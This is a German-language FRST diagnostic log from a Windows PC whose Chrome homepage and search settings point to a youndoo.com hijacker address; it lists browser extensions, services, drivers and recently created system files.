FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.) Chrome: ======= CHR DefaultProfile: ChromeDefaultData CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp" CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22] CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22] CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22] CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22] CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22] CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22] CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User 
Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22] CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22] CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22] CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx ==================== Dienste (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] () R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert] R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.) R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) 
[Datei ist nicht signiert] S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd) S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] () R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert] S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts) R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation) R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.) R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender) R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender) R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation) ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices) S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.) R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.) R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.) R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] () R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices) R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender) R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender) S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender) R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC) R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.) R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC) R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender) R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.) R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation) R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.) R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.) R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.) 
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.) R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.) R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.) R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.) R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.) R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.) R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.) R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.) R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.) R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.) R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.) R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.) R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.) R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.) R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.) R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.) S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.) R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.) R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.) 
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X] S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X] S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X] ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-05-21 21:01 - 2017-05-21 21:01 - 00263448 ____N (Kaspersky Lab, Yury Parshin) C:\WINDOWS\system32\Drivers\95389174.sys 2017-05-21 21:00 - 2017-05-21 21:02 - 00285270 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt 2017-05-21 20:56 - 2017-05-21 20:56 - 00000000 ___HD C:\OneDriveTemp 2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt 2017-05-19 14:28 - 2017-05-21 21:04 - 00000000 ____D C:\FRST 2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN 2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings 2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll 2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll 2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll 2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll 2017-05-09 21:39 - 2017-04-28 03:38 - 
01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll 2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll 2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll 2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll 2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS 2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe 2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll 2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft 
Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx 2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll 2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll 2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe 2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx 2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys 2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll 2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll 2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll 2017-05-09 
21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe 2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll 2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk 2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver 2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive 2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini 2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG 2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 